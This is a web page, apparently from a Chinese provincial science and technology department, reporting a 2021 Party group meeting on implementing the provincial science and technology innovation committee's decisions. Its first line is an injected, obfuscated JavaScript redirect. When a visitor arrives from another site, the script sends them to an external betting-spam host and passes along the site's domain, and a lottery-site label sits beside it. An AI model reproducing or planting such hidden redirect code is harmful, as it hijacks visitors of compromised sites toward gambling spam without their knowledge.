var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 工作动态

省科技厅召开党组扩大会研究贯彻落实省科技创新委员会第一次会议精神


发布日期:2021-09-29 10:55来源:办公室 阅读次数:

  近日,省科技厅党组书记、厅长陈向平召开党组扩大会议,研究贯彻落实省科技创新委员会第一次会议精神等工作。

  会议强调,召开省科技创新委员会第一次会议,充分体现了省委、省政府对科技创新的高度重视和高位推动科技创新的政治站位和责任担当。全厅上下要提升思想认识,增强机遇意识和挑战意识,深刻领会省委省政府的决策意图、政策初衷,准确把握省委省政府工作的聚焦点是什么、要求是什么,把全厅各项工作的目标、标准、进度向省委省政府要求对标对表,主动、及时、创造性开展工作,确保与省委省政府同频共振。要提振精神,拿出再出发、从头越的干事志气,铆足“比”的劲头、增强“学”的主动、激发“赶”的动力、强化“超”的追求,在全厅营造比学赶超的良好氛围,奋发有为、奋勇争先,推动科技创新工作再上新台阶,开创新局面。

  会议指出,要增强能力本领,将其作为一种政治责任、一种人生境界、一种终身追求,弥补知识弱项、能力短板、经验盲区,以更好应对复杂局面、完成艰巨任务、破解工作难题。要围绕省委省政府关于科技创新的新要求、新部署,敢于改革创新,转变陈旧僵化的思维模式,破除狭隘局限的路径依赖,以敢抓敢干、敢闯敢拼、敢作敢为的劲头应变局、开新局。要倡导专业精神,练就扎实过硬的业务能力,涵养干事创业的底气,努力成为科技管理工作的行家里手。

  会议对省科技创新委员会第一次会议决定事项进行了任务分工。会议强调,要牢固树立狠抓落实的意识,发扬求真务实、真抓实干的优良作风,拿出抓铁有痕、踏石留印的韧劲,确保决定事项落地生根、开花结果。要牢固树立节点反馈的意识,对于每项任务要清单化管理,明确时间表,在重要节点及时反馈进展情况,提高工作效率,确保任务更好完成。要牢固树立统筹协调的意识,立足科创委办公室职责职能,强化系统观念,树立大局观、战略观,统筹协调各方推动工作落实到位。